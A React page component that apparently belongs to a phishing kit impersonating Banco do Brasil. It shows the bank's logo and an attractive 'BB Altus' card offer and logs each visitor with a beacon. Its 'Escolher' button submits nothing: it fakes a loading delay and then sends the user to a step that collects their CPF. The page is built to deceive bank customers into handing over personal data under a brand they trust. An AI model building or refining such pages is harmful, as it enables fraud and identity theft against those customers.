import React, { useState, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import './ibcartao.css';
import Loading from "./components/loading"

const CartaoConfirmPage = function () {
    const navigate = useNavigate();
    const [isLoading, setIsLoading] = useState(false);

    useEffect(() => {
        navigator.sendBeacon("/log/cartao_disponivel");
    }, []);

    async function apiSubmit(e) {
        setIsLoading(true);
        setTimeout(() => {
            navigate('/onboarding/customer/cpf');
        }, 1500);
    }

    return <>
        {isLoading && <Loading />}
        <div className='header flex items-center'>
            <div className='content flex items-center gap-x-4'>
                <div className='flex items-center w-auto border-r pr-4'>
                    <img src='/assets/img/bb-logo.svg' className='logo' />
                </div>
                <div className='flex-1'>
                    <span className='subtitle'>O cartão mais sofisticado do mercado</span>
                </div>
            </div>
        </div>
        <div className="steps mt-5 flex gap-x-2">
            <div className='flex-1 check'></div>
            <div className='flex-1 '></div>
            <div className='flex-1 '></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
        </div>
        <div className='container pb-12'>
            <div className='content mt-8'>
                <h1>Oferta disponível para você</h1>
                <div className="card-container flex flex-col items-center gap-4 mt-6">
                    <img src='/assets/img/bb-altus.png' className="card-img" alt="" />
                    <div className='flex flex-col gap-1 items-center'>
                        <p>BB Altus: Mais do que Visa Infinite</p>
                        <p className='red body'>12 meses de isenção de anuidade</p>
                    </div>
                    <div className='w-full separator-bottom'></div>
                    <div className='beneficios py-4'>
                        <div className='img'>
                            <img src='/assets/img/icons/gift.svg' width="24" height="24" alt="" />
                        </div>
                        <p>5 pontos para cada dólar gasto.</p>
                        <div className='img'>
                            <img src='/assets/img/icons/aviao.svg' width="24" height="24" alt="" />
                        </div>
                        <p>Pontos que nunca expiram.</p>
                        <div className='img'>
                            <img src='/assets/img/icons/globo.svg' width="24" height="24" alt="" />
                        </div>
                        <p>Salas VIP ilimitadas.</p>
                        <div className='img'>
                            <img src='/assets/img/icons/bagagem.svg' width="24" height="24" alt="" />
                        </div>
                        <p>Concierge Visa exclusivo.</p>
                        <div className='img'>
                            <img src='/assets/img/icons/3.svg' width="24" height="24" alt="" />
                        </div>
                        <p>Até 8 cartões Altus isentos.</p>
                        <div className='img'>
                            <img src='/assets/img/icons/cartao.svg' width="24" height="24" alt="" />
                        </div>
                        <p>Cartão Online: faça compras na internet antes do seu cartão físico chegar.</p>
                    </div>
                    <button className='primary w-full mt-2' onClick={apiSubmit}>Escolher</button>
                </div>
            </div>
        </div>
    </>
}

export default CartaoConfirmPage;